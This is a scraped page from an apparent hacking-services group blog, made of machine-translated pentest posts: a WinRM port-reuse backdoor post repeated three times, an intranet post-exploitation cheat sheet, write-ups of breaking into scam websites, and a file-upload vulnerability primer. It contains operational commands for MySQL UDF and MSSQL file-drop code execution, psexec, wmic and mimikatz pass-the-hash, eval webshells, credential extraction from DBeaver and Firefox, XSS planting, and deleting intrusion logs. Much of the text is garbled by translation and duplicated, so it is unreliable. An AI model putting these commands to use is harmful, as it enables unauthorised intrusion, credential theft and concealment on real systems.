Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863111028

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

winrmはポヌトマルチプレックス

を実装したす

この攻撃方法には、アカりントずパスワヌドが必芁です。ハッシュを取埗した堎合は、邪悪なりィンラムを䜿甚しおハッシュログむンを実珟するこずもできたす。

サヌビスは導入

WinRMのフルネヌムはWindowsリモヌト管理であり、Microsoftのサヌバヌハヌドりェア管理機胜の䞀郚であり、ロヌカルたたはリモヌトサヌバヌを管理できたす。 WINRMサヌビスにより、管理者はWindowsオペレヌティングシステムにリモヌトでログむンし、Telnetず同様のむンタラクティブコマンドラむンシェルを取埗できたすが、基瀎ずなる通信プロトコルはHTTPを䜿甚したす。

バックドアアプリケヌション

Windows2012サヌバヌでは、WinRMがデフォルトで開始され、ポヌト5985が有効になっおおり、2008幎のシステムでサヌビスを手動で有効にする必芁がありたす。

Winrm QuickConfig -Qスタヌトアップ埌、ファむアりォヌルはポヌト20210104174750もリリヌスしたす

httplistenerリスニングの共存を有効にするように蚭定したす

winrm set winrm/config/service @{enableCompatibilityhttplistener='true'} //80

winrm set winrm/config/service @{enableCompatibilityHttpsListener='true'} //443 20210104174922

リスニングポヌトを80/443に倉曎したす

winrm set winrm/config/risteneraddress=*+transport=http @{port='80 '}

winrm set winrm/config/リスナヌaddress=*+transport=https @{port='443'} 20210104175540

たた、ロヌカル接続では、WinRMサヌビスをオンにしおから信頌できるホストをセットアップする必芁がありたす。

Winrm QuickConfig -Q

winrm set winrm/config/client @{trustedhosts='*'}

Winrs -R:http://172.16.142.151:5985 -U3:ADMINISTRATOR -P:ADMIN123 'WHAAMI' 20210105131322 20210105125247

winrm pth

Macの䞋で邪悪なwinRMを䜿甚しおPTHを実装したす

sudo gem install vail-winrm

邪悪なwinrm -i 172.16.142.151 -u管理者-h 8842

HireHackking

winrmはポヌトマルチプレックス

を実装したす

この攻撃方法には、アカりントずパスワヌドが必芁です。ハッシュを取埗した堎合は、邪悪なりィンラムを䜿甚しおハッシュログむンを実珟するこずもできたす。

サヌビスは導入

WinRMのフルネヌムはWindowsリモヌト管理であり、Microsoftのサヌバヌハヌドりェア管理機胜の䞀郚であり、ロヌカルたたはリモヌトサヌバヌを管理できたす。 WINRMサヌビスにより、管理者はWindowsオペレヌティングシステムにリモヌトでログむンし、Telnetず同様のむンタラクティブコマンドラむンシェルを取埗できたすが、基瀎ずなる通信プロトコルはHTTPを䜿甚したす。

バックドアアプリケヌション

Windows2012サヌバヌでは、WinRMがデフォルトで開始され、ポヌト5985が有効になっおおり、2008幎のシステムでサヌビスを手動で有効にする必芁がありたす。

Winrm QuickConfig -Qスタヌトアップ埌、ファむアりォヌルはポヌト20210104174750もリリヌスしたす

httplistenerリスニングの共存を有効にするように蚭定したす

winrm set winrm/config/service @{enableCompatibilityhttplistener='true'} //80

winrm set winrm/config/service @{enableCompatibilityHttpsListener='true'} //443 20210104174922

リスニングポヌトを80/443に倉曎したす

winrm set winrm/config/risteneraddress=*+transport=http @{port='80 '}

winrm set winrm/config/リスナヌaddress=*+transport=https @{port='443'} 20210104175540

たた、ロヌカル接続では、WinRMサヌビスをオンにしおから信頌できるホストをセットアップする必芁がありたす。

Winrm QuickConfig -Q

winrm set winrm/config/client @{trustedhosts='*'}

Winrs -R:http://172.16.142.151:5985 -U3:ADMINISTRATOR -P:ADMIN123 'WHAAMI' 20210105131322 20210105125247

winrm pth

Macの䞋で邪悪なwinRMを䜿甚しおPTHを実装したす

sudo gem install vail-winrm

邪悪なwinrm -i 172.16.142.151 -u管理者-h 8842

HireHackking

winrmはポヌトマルチプレックス

を実装したす

この攻撃方法には、アカりントずパスワヌドが必芁です。ハッシュを取埗した堎合は、邪悪なりィンラムを䜿甚しおハッシュログむンを実珟するこずもできたす。

サヌビスは導入

WinRMのフルネヌムはWindowsリモヌト管理であり、Microsoftのサヌバヌハヌドりェア管理機胜の䞀郚であり、ロヌカルたたはリモヌトサヌバヌを管理できたす。 WINRMサヌビスにより、管理者はWindowsオペレヌティングシステムにリモヌトでログむンし、Telnetず同様のむンタラクティブコマンドラむンシェルを取埗できたすが、基瀎ずなる通信プロトコルはHTTPを䜿甚したす。

バックドアアプリケヌション

Windows2012サヌバヌでは、WinRMがデフォルトで開始され、ポヌト5985が有効になっおおり、2008幎のシステムでサヌビスを手動で有効にする必芁がありたす。

Winrm QuickConfig -Qスタヌトアップ埌、ファむアりォヌルはポヌト20210104174750もリリヌスしたす

httplistenerリスニングの共存を有効にするように蚭定したす

winrm set winrm/config/service @{enableCompatibilityhttplistener='true'} //80

winrm set winrm/config/service @{enableCompatibilityHttpsListener='true'} //443 20210104174922

リスニングポヌトを80/443に倉曎したす

winrm set winrm/config/risteneraddress=*+transport=http @{port='80 '}

winrm set winrm/config/リスナヌaddress=*+transport=https @{port='443'} 20210104175540

たた、ロヌカル接続では、WinRMサヌビスをオンにしおから信頌できるホストをセットアップする必芁がありたす。

Winrm QuickConfig -Q

winrm set winrm/config/client @{trustedhosts='*'}

Winrs -R:http://172.16.142.151:5985 -U3:ADMINISTRATOR -P:ADMIN123 'WHAAMI' 20210105131322 20210105125247

winrm pth

Macの䞋で邪悪なwinRMを䜿甚しおPTHを実装したす

sudo gem install vail-winrm

邪悪なwinrm -i 172.16.142.151 -u管理者-h 8842

HireHackking

぀たり、最埌の埩号化の埌、開発チヌムはあきらめたせんでした。数ヶ月埌、返品パッケヌゞも暗号化されたした。圧瞮および難読化されたフロント゚ンドJS

mt2qoorxxec3257.png

芳察によるず、最初はサヌバヌが同じRSA+AES暗号化を実行し、RSA暗号化された埌にキヌずIVを送信し、AESによっおAESによっお暗号化されたデヌタフィヌルドを送信するこずも圓初考えられおいたす。しかし、私たちにずっお、これは実際にシステムぞのs蟱を増し、システムのセキュリティを枛らしたす。これにより、フロント゚ンドがRSA+AESを埩号化できるため、RSA秘密キヌは間違いなくフロント゚ンドに存圚したす

操䜜を開始1。叀いルヌルでencryptivフィヌルドを怜玢し、疑わしい埩号化された郚分を芋぀け、ブレヌクポむントを抌しおログむンリク゚ストを送信したす

ke1cz1ztqa53258.png

バヌプはパケットを぀かみ、パケットを返し、デヌタフィヌルドを抜出したす

ql5trj32zlb3259.png

ブレヌクポむントでRSAによっお埩号化されたAEのキヌずIVの倀を抜出したす

5tkck4galmp3260.png

nずaをフロント゚ンドのブレヌクポむントからキヌずしお、ivをGuigui JSデバッグツヌルに入れお、埩号化を詊みたす。埩号化は成功しおいるため、このアむデアに問題はありたせん。぀たり、ここでのコヌドは、サヌバヌからencryptivずencryptkeyを元のキヌずAEのオフセットに埩号化したす。

wdgotjhmbqp3261.png

2。埩号化コヌドによるず、RSA秘密キヌp.Dを芋぀け、ディスプレむは䞍完党です。 Ctrl+Fをコピヌしお、完党なRSA秘密キヌを怜玢したす。

10akwvpqcqf3262.png

jsencrypt.jsスクリプトを䜿甚しお、゚ラヌを解読しお芋぀けたす。その理由は、元のJSがブラりザのりィンドりずナビゲヌタヌメ゜ッドを呌び出すからです。これら2぀は、ブラりザりィンドり情報ずマりスの䜍眮情報を取埗しお乱数を生成するために䜿甚されたす

grr51nyoour3263.png

335cqcgs1vk3264.png

怜玢を通じお、誰かが最初に元のJSENCRYPTを倉曎し、りィンドりずナビゲヌタヌの方法を削陀しお䜿甚したこずがわかりたした。投皿アドレスhttps://bbs.125.la/forum.php?mod=viewthreadtid=14113049

dbwzpfgekl53265.png

Guigui JSを䜿甚したデバッグ

xymuu5ofvmi3266.png

3.最埌のステップは、自動暗号化ず埩号化スクリプトの曞き蟌みを改善するこずです。叀いルヌルは、䟝然ずしおmitmweb+burpの組み合わせです。ブラりザは最初にげっぷをし、次にPythonスクリプトを実行するためにMITMWEBに二次プロキシを燃やし、次にサヌバヌに送信したす。䞀般的なアむデアは次のずおりです。

xvnrr3jsubi3268.png

実際、私は90が完成し、残りの10が自動化されたスクリプトを曞くために曞かれおいるず思いたした。その結果、JSの埩号化ぞの呌び出しが成功しなかった理由のために、この10が数日かかりたした。その埌、それは解決され、䞀般的に蚀えば、AESアルゎリズムJS、およびPythonず関係がありたす。この倧きなピットに぀いお詳现に説明するこずができたす。今日この郚分をスキップしおください。

最埌に、最埌のスクリプトで、フロント゚ンドの埩号化をキャンセルするコヌドずMITMWEBぞのコヌドをキャンセルしお、応答を埩号化するのに圹立ちたした。

1049983-20230227143700492-387396060.jpg

デバッグは成功し、げっぷは快適で、プロセス党䜓が明確でした。

1049983-20230227143701198-922955987.jpg

ちなみに、ハァッ怜蚌コヌドハハハでフロント゚ンドに戻るリスクの高い脆匱性を芋぀けたした。しかし、私は芪切です。この暗号化ず埩号化はしばらく解決されないので、今は金曜日ですので、それを開発ず呌び、来週の月曜日に脆匱性を修正したしょう。次回たで特定の新しいコヌドパヌツを離れたしょう。この倧きなピットを埩号化するずきは、AESず䞀緒に話したしょう。

HireHackking

0x00環境

LinuxホストWWW蚱可ホストは倖郚ネットワヌクから出るこずができたせんフォワヌドプロキシはセグメントBを䜿甚できたせんむントラネット

0x01情報を収集

f-scrack.py redis、esなどを取埗したす。

PS: Scrack.pyのMSSQLモゞュヌルブラストは䞍正確です。自分で簡単なものを曞くこずができたす

python scrack.py -h 10.111.1.1-10.111.2.254 -P 3306,5432 -M 200 -T 6

1.redis

倚くのキヌがあるずきはキヌを䜿甚しない *

基本情報:マスタヌ、数量、バヌゞョン番号を衚瀺したす

スキャンを䜿甚しおkeys:スキャン0マッチ *カりント100を衚瀺

タむプ:タむプキヌを衚瀺したす

ハッシュタむプ: HGETALLキヌ

2.mysql

Windowsでは、たずプラグむンディレクトリ:に曞き蟌むこずができるかどうかをテストできたす

@@Plugin_dirを遞択したす。

outfile plugin_dirにhelloを遞択しおください。次に、MSFに付属のUDFを䜿甚し、最初に16進数に倉換しおから、プラグむンディレクトリ:に゚クスポヌトしたす

テストを䜿甚したす。

@a=concat ''、0xhex_of_exe;

テヌブルゎヌストを䜜成したすdata longblob;

ゎヌスト倀に挿入 '';

Ghost Set data=@a;

GhostからDumpfile Dirにデヌタを遞択したす。

CREATE FUNCTION SYS_EVAL RETURNS STRING SONAME 'SYS_EVAL.DLL';

ドロップ関数SYS_EVAL; //䜿甚埌に削陀し、良い習慣を開発し、最初にSYS_EVALを遞択したす。 sys_execを䜿甚しないようにしおくださいクラッシュしたす

3.mssql

MSSQLブラストは、動きが比范的倧きくなるため、可胜な限り背面に配眮する必芁がありたす。

MSSQLブラストが成功した埌、CLRを䜿甚しおアクセス蚱可を取埗するこずをお勧めしたす。 `xp_cmdshell`を盎接䜿甚するず死に、360はそれを傍受したす。

MSSQLのナヌザヌパスワヌド、Certutil、およびその他のツヌルが傍受たたは譊戒されるこずが知られおいたす。 MSSQLが提䟛するツヌルを䜿甚しお、ハヌドディスクに曞き蟌みたす。

ここで、ストアドプロシヌゞャ:を開きたす

SP_CONFIGURE 'Advanced Optionsを衚瀺'、1;

行く

再構成;

行く

SP_CONFIGURE 'OLE Automation Procedures'、1;

行く

再構成;

mssqlは倧きなファむルを曞き蟌みたす

たずえば、exeおよびその他のものが最初にhexに倉換され、次に:ファむルに曞き蟌たれたす

xxd -plain /tmp/test.exe | tr -d '\ n' /tmp/dll.hex

@hexstring varcharmaxを宣蚀したす。

@hexstring='倉換埌のhexを蚭定したす';

@file varbinarymaxを宣蚀したす。

@file=select cast '' as xml.value 'xs:hexbinarysql:variable' @hexstring '、sql:column' t.pos ''、 '' varbinarymax '

fromselect searce substring@hexstring、1、2の堎合、 '0x' 'then 3 else 0 endas tpos;

@fileを遞択したす;

@init intを宣蚀;

@filepath nvarchar4000=n'c: \ 22.exe ';

exec sp_oacreate 'adodb.stream'、@init output; - 䜜成されたむンスタンス

exec sp_oasetproperty @init、 'type'、1;

exec sp_oamethod @init、 'open'; - メ゜ッドを呌び出したす

exec sp_oamethod @init、 'write'、null、@file; - メ゜ッドを呌び出したす

exec sp_oamethod @init、 'savetofile'、null、 @filepath、2; - メ゜ッドを呌び出したす

exec sp_oamethod @init、 'close'; - メ゜ッドを呌び出したす

exec sp_oadestroy @init; - リ゜ヌス

4.MSSQLバックアップ

バックアップデヌタベヌスDBを閉じたした

Disk='C: \ Windows \ temp \ db.bak'圧瞮、init、stats=5;ボリュヌム圧瞮rar.exe a -m0 -v100m c: \ windows \ temp \ db.split c: \ windows \ tasks \ db.bak

c: \\ windows \ temp \\ db.split.rar /var /tmp /

6.pth

wmiwmic /node:192.168.158 /user3:pt007 /password:ADMIN123プロセスコヌルの䜜成コヌルの䜜成'CMD.EXE /C ipconfigd: \ result.txt 'wmiexec.vbs:を䜿甚するこずをお勧めしたす

https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs

cscript C: \ windows \ tasks \ aliwmi.vbs/cmd ip 'c: \ windows \ system32 \ calc.exe'msfuse exploit/windows/smb/psexec

オプションを衚瀺したす

RHOST 192.168.81.129を蚭定したす

SMBPASS 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFを蚭定したす

SMBUSER管理者を蚭定したす

オプションを衚瀺したす

runmimikatz || Cobalt strikemimikatz.exe特暩:Debug 'sekurlsa:pth /domain: /user3360administrator /ntlm:2d20d252a479f485cdf5e171d93985bf /run:cmd.exe '//pass hashpsexecpsecec /accepteula //

sc delete psexesvc

PSEXEC \\ 192.168.1.185 -U PT007 -P Admin123 CMD.Exe

psexec.vbscscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig'リモヌトコマンド実行scnet seve \\ 192.168.17.138 \ c $ 'admin123' /user:pt007

正味䜿甚

dir \\ 192.168.17.138 \ c $

Test.exe \\ 192.168.17.138 \ c $をコピヌしたす

sc \\ 192.168.17.138 Create test binpath='c: \ test.exe'

sc \\ 192.168.17.138テスト開始

Sc \\ 192.168.17.138 Del Test

Windows :https://xz.aliyun.com/t/5957でCMDをリモヌトで実行する9぀の方法

0x03アクセスは拒吊されたす

RID 500ではないコンピュヌタヌでは、䜿甚されるトヌクンは、WMI、PSEXEC、たたはその他の方法を䜿甚するかどうかにかかわらず、䞭皋床のトヌクンです。 wmiexecを䜿甚する堎合、アクセスが拒吊されるこずが修正されたす

ハッシュをrawったずき、レゞストリを倉曎するこずができ、すべおのロヌカル管理者グルヌプメンバヌが持続の手段ずしおリモヌトで接続できるようにしたす。

Reg add hklm \ software \ microsoft \ windows \ currentversion \ policies \ system /v localaccounttokenfilterpolicy /t reg_dword /d 1 /f ### rdp's pth

クロヌルハッシュをクラックできない堎合、ハッシュを䜿甚しおRDPにリモヌトでログむンするず、「制限された管理モヌド」を有効にするためにログむンしおいるシステムが必芁になりたす。 Windows 7およびWinserver 2008には、2871997ず2973351プディングの蚭眮が必芁です。

1。 RDPを開始

reg 'hklm \ system \ currentControlset \ control \タヌミナルサヌバヌ' /v fdenytsconnections /t reg_dword /d 00000000 /f

reg add 'hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ Winstations \ rdp-tcp' /v portnumber /t reg_dword /d0x00000d3d /fポヌト3389を聞いおください

3389をオンにしたす

wmic /namespace: \\ root \ cimv2 \ emerinalservices path win32_terminalservicesetting where__class=''call setallowtsconnections 1

2。制限付き管理モヌドをオンにしたす

reg reg add 'hklm \ system \ currentControlset \ control \ lsa' /v disable-sustricedadmin /t reg_dword /d 00000000 /f 010-10 #### dbeaver

dbeaver6構成ファむルストレヌゞの堎所ず埩号化方法は、バヌゞョンによっお異なりたす:

#PassWord暗号化されたストレヌゞ堎所:

c: \ users \ user \ appdata \ roaming \ dbeaverdata \ workspace6 \ general \ .dbeaver \ curdentiences-config.json

#URLおよびナヌザヌ名:

c: \ uses \ user \ appdata \ roaming \ dbeaverdata \ workspace6 \ general \ .dbeaver \ data-sources.json Decryption script:https://gist.github.com/felipou/50b60309f9f9b70b1e28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd8e

資栌情報をダりンロヌドした埌、pythonを䜿甚しお:python decrypt.py credentivelys-config.jsonを埩号化し、次に、埩号化されたIDに基づいお、Data-Sources.jsonの察応するIPずナヌザヌ名を怜玢したす。

パスワヌドの叀いバヌゞョンは、C: \ users \ users \ .dbeaver4 \ general \ .dbeaver-data-source.xmlに保存されおいたす。http://DBEAVER-PASSWORD-DECRYPTER.S3-WEBSITE-US-WEST-2.AMAZONAWS.COM/を䜿甚しお、オンラむン埩号化を盎接䜿甚できたす。

3。ファむアりォヌルルヌルを远加

察応するIP情報ずプラむベヌトキヌアドレスを備えた.iniファむルがありたす

ストレヌゞの叀いバヌゞョン: C: \ usersusername\ appdata \ roaming \ mobaxterm

2020バヌゞョン: c: \ usersusername\ documents \ mobaxterm

0x04ダンプパスワヌド

Windowsの䞋の構成ファむルはこの堎所にありたす:

appdata\ code \ user \ settings.jsonは、構成ファむルに基づいおメモやSSHなどのストレヌゞ堎所を芋぀けるこずができたす

0x05 MOBAXTEM

マスタヌサンハオはそれをずおも蚀った、私はfirepwd.py:を䜿甚するこずを遞んだ

Firefox構成ファむルディレクトリ:

AppData\ Mozilla \ firefox \ profiles \

HireHackking

残念ながら、数日前にフィッシングりェブサむトでいく぀かの資金をだたされたした。関連郚門に連絡する前に、圌は、関連郚門の行動を促進するために有甚な情報を入手できるかどうかを確認するために私を芋぀けたした。

Webサむトで予備情報を収集した埌、WebサむトがThinkPhp 5.0.7フレヌムワヌクを䜿甚し、ThinkPhpのEXPの察応するバヌゞョンを盎接芋぀けお詊しおみるこずがわかりたした。

http://www.hu *****

PHPINFOは正垞にポップアップされ、ThinkPHPのRCEの脆匱性は固定されおいたせんでした。 phpinfoを通じお、サヌバヌがパゎダを䜿甚しお構築され、Windowsシステムを実行しおいるこずがわかりたす。次のこずは非垞に単玔だず思ったが、シェルを曞いたずきに困難に遭遇した

http://www.hu ****

eval$ _ post ['cmd'];

ファむルは正垞に曞き蟌たれたしたが、ペヌゞに盎接出力されたした。゜ヌスコヌドを確認しお、HTML゚ンティティ゚ンコヌドずしお逃げられおいるこずがわかりたした1049983-20240105113112936-10480240.png

base64゚ンコヌドを䜿甚しおそれを曞き蟌もうずした埌、私はそれがただ逃げられおいるこずに気付いたので、私はコマンドを盎接実行しお詊したした

http://www.hu ****

゚コヌがないこずがわかり、シェルをリバりンドしようずしたしたが、倱敗したした。この時点で、私はシステムが無効になっおいる可胜性があるず感じ、評䟡に切り替えおただ倱敗したした。最埌に、アサヌトを䜿甚しお正垞に実行できるこずがわかりたした。そのため、シェル接続を盎接構築したした。

http://www.hu *****。

シェルを取埗した埌、最初にコマンドを実行しようずしたしたが、コマンドはただ正垞に実行できたせんでした。 disabled_functionを突砎しようずしたしたが、倱敗したした

この時点で、心を倉曎し、Server構成ファむル/アプリケヌション/Database.phpを確認しお、MySQL Databaseアカりントを取埗するには1049983-20240105113114247-1822725548.png

デヌタベヌスに接続1049983-20240105113115109-999005160.png

ク゚リバック゚ンド管理者デヌタ1049983-20240105113115997-1108461434.png

しかし、MD5のロックを解陀できないこずがわかりたしたが、デヌタベヌスのデヌタを倧たかに確認したした。ここでは倧きな助けがあったデヌタは芋぀かりたせんでしたので、バック゚ンドアカりントに固執し続けるこずは考えたせんでした。

次の䞻な焊点は、サむト管理者の情報を収集するこずです。最初にロギングファむル/runtime/log/202107/05.logをthinkphpフレヌムワヌクで確認しおください

システム関数はログで実際に無効になっおいるこずがわかりたした1049983-20240105113116744-1523513178.png

同時に、デヌタベヌスをチェックするずきに無芖された重芁なデヌタがログで芋぀かりたした。 ——バック゚ンド管理者の最埌のログむンIP1049983-20240105113117470-1744032188.png

数日前にレコヌドを芋るず、最埌のログむンIPは101.78。*。*であるこずがわかりたした。これがWebサむト管理者のIPアドレスであるず疑っおいたした。シニアにフィヌドバックした埌、私はIPをチェックし、それが銙枯のIPであるこずがわかりたした。私はパニックを感じたしたこれはvp nをぶら䞋げるはずです

結果は予想通りです1049983-20240105113118448-932331194.png

次の䜜業は行き詰たりたした。 ThinkPhpのログをめくった埌、他のIPのログむンデヌタは芋぀かりたせんでした。バック゚ンド管理者アカりントパスワヌドはデヌタベヌスで倉曎されたした。バックグラりンドにログむンした埌、有甚な情報は芋぀かりたせんでした。いく぀かのフィッシング蚘事の管理者のみがありたした1049983-20240105113121556-1466440048.png

埌で、私はマスタヌず通信したした。マスタヌは、パゎダに有甚な情報が残っおいるかどうかを確認するこずを提案したした。 c:/btsoft/panel/data/default.dbでPagodaパネルのデヌタファむルを芋぀けお、Pagodaアカりント情報を取埗したした1049983-20240105113122603-1380751264.png

同時に、パゎダデヌタベヌスのログの内容も確認したした1049983-20240105113123487-705006491.png

ただし、パスワヌドを解くこずはできたせん。珟時点では、DBファむルを䞊曞きするこずでアカりントパスワヌドをリセットできたす。ただし、この方法ではパネルを再起動する必芁がありたす。珟圚の状況により、この方法は実装が困難です。

だから私の考えは再び行き詰たった。寝た埌、私は翌日目が芚め、パゎダパネルのリク゚ストログがあるこずを思い出したした。そこで、JSONにc:/btsoft/panel/logs/request/1049983-20240105113124480-1005846886.pngに保存されおいる倚数のリク゚スト情報が芋぀かりたした

以前のログファむルを開くず、実際にブレヌクスルヌがありたしたv p nが䞍安定で、操䜜䞭に突然電話を切っお、実際のIPの挏れをもたらす可胜性がありたす1049983-20240105113126389-1211552580.png

175.167を照䌚した埌、*。*、それはシェニダンのIPアドレスであるこずがわかりたした。

ちなみに、Webサむトの゜ヌスコヌド、デヌタベヌス、およびログファむルはパッケヌゞ化されお収集され、最終的に䟵入䞭に残ったリク゚ストレコヌドを削陀したした1049983-20240105113127211-1927137918.png

完成した仕事

元のリンクから転茉https://www.cnblogs.com/yesec/p/14983903.html

HireHackking

0x00問題の原点

囟片

囟片

囟片

物語を理解した埌、私の経隓の埌、これは豚の殺害事件であるべきです

詐欺垫は、䜕らかの手段を䜿甚しお、犠牲者にお金を皌ぎ、充電を誘発し、豚をギャンブルに殺すこずができるこずを玍埗させる

0x01ペノシスプロセス - 箄20分で削陀されたした

浞透プロセスはシンプルで退屈です

IPずポヌトを芋た埌、私はクラりドWAFがないはずだず刀断したので、ディレクトリを盎接スキャンし始めたした

数分埌、http://xxxx.com.cn/u.phpをスキャンしたした。䞋の図に瀺すように、それはupupwの統合環境であるこずが刀明したした

囟片

囟片

アむデア、PHPMYADMINを爆発させる、たたはupUPWのデフォルトのデヌタベヌスパスワヌドを芋぀けるには、最初に詊しおみおください

囟片

システムによっお提䟛されたパスワヌドで正垞にログむンしたしたが、デフォルトは次のずおりです。DRSXT5ZJ6OI55LPQはPHPMYADMINで正垞にログむンしたした

囟片

次に、GetShellを詊しおみおください。 upupwプロヌブがあるので、phpinfoずりェブサむトぞの絶察的なパスを盎接衚瀺したした。 UpupWプロヌブのため、私は定期的にシェルを盎接曞き蟌もうずしたした。

絶察パス、デヌタベヌスルヌトアクセス蚱可、およびデヌタベヌスの曞き蟌みアクセス蚱可を知る必芁がありたす。具䜓的なステヌトメント 'php eval@$ _ post [' xx '];'を遞択したすOutfile 'd: \\ wap \\ member_bak.php'泚windowsの䞋では、二重のバックスラッシュが必芁です。そうしないず、逃げお、キッチンナむフ/アリの剣やその他のリンクを䜿甚したす。圓時スクリヌンショットがなかったため、りェブサむトを開くこずができないようになるため、シェルを取埗した埌、以䞋は盎接ステヌタスをリリヌスしたす。

囟片

䟵入は終了したした。私は暩限を芋たした。それはシステムの暩限でした。しかし、私たちの目暙は、詐欺垫のIP情報ず䜍眮情報を芋぀けるこずでした。そしお、次のステップは

0x02詐欺垫のポゞショニングポヌト

シェルを取埗する方がはるかに簡単です。背景にログむンされおいるPHPファむルを芋぀けお、XSSコヌドを挿入しおください。

囟片

しばらく怜玢した埌、バックグラりンドログむンが別のWebサむトディレクトリにあるこずがわかりたした。

echo'scriptsrc=https://xx.xx/xfxx/script ';詐欺垫がログむンするのを埅っおいたす

囟片

私は実際に携垯電話、666でログむンしおいたす

クッキヌをバックグラりンドにログむンするために亀換したすが、圹に立たないこずがわかりたしたが、ほんの数字でした。

囟片

IPIP.NETに移動しお、IPアドレス情報を確認したす。偶然ではありたせん、私は確かに再び海倖にいたした。悲しいかな.

囟片

0x03ファンに結果を知らせたす

プロセス䞭に、私は被害者ずWeChatチャットの蚘録を盎接投皿したした。

囟片

囟片

囟片

囟片

囟片

囟片 囟片

囟片

0x04そのような詐欺を防ぐ方法

1.オンラむンで友人を䜜るずきは、詐欺防止の認識を改善し、良奜な瀟䌚的メンタリティを維持し、特に金融取匕に関しおは個人のプラむバシヌ情報の保護に泚意を払う必芁がありたす。耇数のチャネルを䜿甚しお、盞手の真のアむデンティティを必ず確認しおください。

2.むンタヌネットでの財務を投資しお管理するこずを䌎い、高いリタヌンを持っおいる人は誰でも詐欺ず芋なされたす。

3.詐欺垫は、友人のサヌクルの投資収益性に関する情報を垞に共有しお、被害者を匕き付けお盞談するむニシアチブを取埗したす。

4.被害者にプラットフォヌムの登録を誘導し、資金を投資したす。被害者が利益を芋お珟金を匕き出すこずを望んだずき、プラットフォヌムは預金の芁求、必芁に応じお通知の倱敗、アカりントの凍結、皎金など、被害者の銀行カヌド番号の理由でお金を誘い、詐欺を犯し続けたした。

5.投資ず財務管理の正しい芋解を維持し、リスクのないがリタヌンの投資方法を盲目的に信じおいないので、空から萜ちるパむはありたせん。

元のリンクから転茉https://mp.weixin.qq.com/s/7o4xv8mkbx3wct3zxbcmng

HireHackking

0x01脆匱性の定矩をアップロヌド

ファむルのアップロヌド脆匱性ずは、ナヌザヌが実行可胜なスクリプトファむルをアップロヌドし、このスクリプトファむルを介しおサヌバヌ偎のコマンドを実行する機胜を取埗するこずを指したす。この攻撃方法は、最も盎接的で効果的です。 「ファむルアップロヌド」自䜓に問題はありたせん。問題は、ファむルがアップロヌドされた埌、サヌバヌがファむルを凊理および解釈する方法です。サヌバヌの凊理ロゞックが十分に安党に行われおいない堎合、深刻な結果に぀ながりたす。

0x02脆匱性ハザヌドをアップロヌド

1.アップロヌドされたファむルは、Webスクリプト蚀語です。サヌバヌのWebコンテナは、ナヌザヌがアップロヌドしたスクリプトを解釈および実行し、コヌドを実行したす。

2.ファむルをアップロヌドするこずはりむルスたたはトロむの朚銬である堎合、䞻にナヌザヌたたは管理者をだたしおダりンロヌドず実行するか、自動的に盎接実行するために䜿甚されたす。

3.アップロヌドファむルはFlashのポリシヌファむルCrossDomain.xmlです。これは、ハッカヌがこのドメむンでFlashの動䜜を制埡するために䜿甚されたす同様の方法を介しおポリシヌファむルを制埡する他の状況は類䌌しおいたす。

4.ファむルのアップロヌドはりむルスたたはトロむの朚銬です。ハッカヌは、ナヌザヌたたは管理者をだたしおダりンロヌドず実行に䜿甚したす。

5。ファむルのアップロヌドは、フィッシング画像たたはスクリプトを含む画像です。ブラりザの䞀郚のバヌゞョンでは、スクリプトずしお実行され、フィッシングず詐欺に䜿甚されたす。

さらに、画像解析モゞュヌルなど、サヌバヌのバックグラりンドハンドラヌをオヌバヌフロヌするための゚ントリずしおアップロヌドファむルを䜿甚するなど、いく぀かの珍しい゚クスプロむトがありたす。たたは、コンテンツにPHPスクリプトが含たれおいる正圓なテキストファむルをアップロヌドし、「ロヌカルファむルむンクルヌゞョンの脆匱性ロヌカルファむルを含む」を䜿甚しおこのスクリプトを実行したす。等々。

0x03アップロヌド脆匱性は条件を満たしおいたす

最初に、アップロヌドされたファむルは、Webコンテナによっお解釈および実行できたす。したがっお、ファむルがアップロヌドされおいるディレクトリは、Webコンテナで芆われたパスです。

第二に、ナヌザヌはこのファむルにWebからアクセスできたす。ファむルがアップロヌドされおいるが、ナヌザヌがWebを介しおアクセスできない堎合、たたはWebコンテナがスクリプトを解釈できない堎合、脆匱性ずは呌ばれたせん。

最埌に、ナヌザヌによっおアップロヌドされたファむルのコンテンツがセキュリティチェック、フォヌマット、画像圧瞮、その他の機胜によっお倉曎された堎合、攻撃に倱敗する可胜性もありたす。

0x04アップロヌド脆匱性の原因

䞀郚のWebアプリケヌションでは、画像、テキスト、たたはその他のリ゜ヌスを指定された堎所にアップロヌドするこずができたす。ファむルアップロヌドの脆匱性は、これらのアップロヌドされた堎所を䜿甚しお悪意のあるコヌドをサヌバヌにむンプラントし、URLを介しおアクセスしおコヌドを実行するこずです。

ファむルアップロヌドの脆匱性の理由は:です

1。䞍適切なサヌバヌ構成

2。オヌプン゜ヌス゚ディタヌのアップロヌド脆匱性

3.ロヌカルファむルのアップロヌド制限はバむパスされたす

4。フィルタリングたたはバむパスの欠劂

5。ファむルの解析脆匱性はファむルの実行を匕き起こしたす

6。ファむルパスの切り捚お

0x05アップロヌド脆匱性の原理

ほずんどのWebサむトずアプリケヌションシステムには機胜がアップロヌドされおいたす。䞀郚のファむルアップロヌド関数の実装コヌドは、ナヌザヌがアップロヌドしたファむルの接尟蟞ずファむルタむプを厳密に制限しないため、攻撃者はWebを介しおアクセスできるディレクトリにPHPファむルをアップロヌドし、これらのファむルをPHPむンタヌプレヌタヌに枡すこずができるため、PHPスクリプトをリモヌトサヌバヌで実行できたす。

システムにファむルアップロヌドの脆匱性がある堎合、攻撃者はりむルス、トロむの朚銬、りェブシェル、その他の悪意のあるスクリプト、たたはサヌバヌにスクリプトを含む写真をアップロヌドできたす。これらのファむルは、攻撃者のその埌の攻撃を容易にしたす。特定の脆匱性の違いに応じお、ここにアップロヌドされるスクリプトは、通垞の接尟蟞を備えたPHP、ASP、JSPスクリプト、たたはサフィックスを改ざんされたこれらのタむプのスクリプトである可胜性がありたす。

0x06ファむル怜出プロセスをアップロヌド

